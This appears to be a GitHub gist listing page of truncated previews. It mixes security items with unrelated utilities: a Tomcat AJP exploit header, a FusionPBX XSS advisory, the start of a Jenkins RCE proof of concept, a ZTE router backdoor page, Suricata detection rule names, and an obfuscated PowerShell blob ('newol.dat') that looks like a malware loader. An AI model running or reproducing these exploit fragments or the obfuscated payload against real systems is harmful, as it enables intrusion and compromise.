xax007
@xax007
xax007 / tomcat-ajp-lfi.py
Created February 23, 2020 15:00
Apache Tomcat AJP local file include and code execution exploit

```python
#!/usr/bin/env python
# Tomcat-AJP LFI
import struct
# Some references:
# [url]https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html[/url]
def pack_string(s):
    # AJP encodes a null string as a length of -1 (0xFFFF)
    if s is None:
        return struct.pack(">h", -1)
    l = len(s)
```
@xax007
xax007 / FusionPBX-XSS.md
Last active February 4, 2021 10:29
FusionPBX-XSS
@xax007
xax007 / FusionPBX-XSS.md
Last active November 20, 2019 16:30
FusionPBX XSS

XSS 1

Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

```php
...
    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
    }
...
```
@xax007
xax007 / Suricata_Rules_Descriptionaa
Created June 3, 2019 05:27
Suricata_Rules_Descriptionaa
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer No TLS after STARTTLS
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
@xax007
xax007 / 0dedict.py
Created May 5, 2019 06:43 — forked from josephg/0dedict.py
Apple dictionaries
```python
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python 0dedict.py
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mohave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/Body.data'
f = open(filename, 'rb')
```
View newol.dat
$epGjM = [Char[ ] ]"))93]rAhc[]GNiRtS[,'tprT'(ECalPer.)63]rAhc[]GNiRtS[,)55]rAhc[+18]rAhc[+411]rAhc[+28]rAhc[+211]rAhc[((ECalPer.)'|',)77]rAhc[+79]rAhc[+94]rAhc[+38]rAhc[+15]rAhc[((ECalPer.)43]rAhc[]GNiRtS[,'VMbWd'(ECalPer.)'
)tprTtprTNiOJ-tprTXtprT+]3,1[)(GnIRTSOt.EcneREfeRpesoBrEv7QrRp (. Ma1S3)69]rahc[,)89]rahc[+99]rahc[+79]rahc[+511]rahc[+84]rahc[( ecALPER- 43]rahc[,tprTmHLYsJtprT EcALpERc- 63]rahc[,tprTGDuihltprTecALPER-421]rahc[,tprTstMqQztprT ecALPER- 29]'+'rahc[,)35]rahc[+121]rahc[+89]rahc[+87]rahc[+45]rahc[+84]rahc[( ecALPER-93]rahc[,)17]rahc[+111]rahc[+27]rahc[+911]rahc[+68]rahc[+67]rahc[( EcALpERc-))tprTAvDREPQQ8Y0iEBjd3DEAAAAu8YWAEJ9MBAWjEBAAAoZhPAchAAAASm+3LG0//TUkoDgCKIVFNiEIkQUiIBgCK4XBNy0zLGEAKUAtF0ISAAw9HmbQGsOAAcv65GEAAAgypDgJDm0///rAoDXSLiUC0lchI5wiJBAAAQOhPAchYv4//TcboDXSLikDLmEAAAg+F+AwFi9i//f3DjuzLi00La8iNx8iFR+MFNAdAX4//vnToP9iLcXG7IBdJXISY50iIdwVIawRIiA6BL8iFcEiQgewCvIBHhIGoHswL+xiBlDBJiDBLCAAAQQrE0IOkw0iIJxcAAAAgSCl58fVNCAABsWhPAchYv4//TM9oDXTLm0DJGEAAAAkkw7iMBAAA87hPAAAAAIJMuDyLMg
@xax007
xax007 / go-os-arch.md
Created April 11, 2019 02:30 — forked from asukakenji/0-go-os-arch.md
Go (Golang) GOOS and GOARCH

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, i.e. without the help of a C compiler, etc.)

  • android
  • darwin
@xax007
xax007 / README.md
Created March 16, 2019 09:09 — forked from Tom4t0/README.md
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft Active Directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self-signed certificate suitable for the AD server to use for LDAPS, thereby enabling LDAPS on that server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor-purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

View CVE-2019-1003000-Jenkins-RCE-POC.py
```python
import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
```
@xax007
xax007 / web_shell_cmd.gch
Created November 30, 2018 11:32
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
```html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F460 Webshell
</title>
```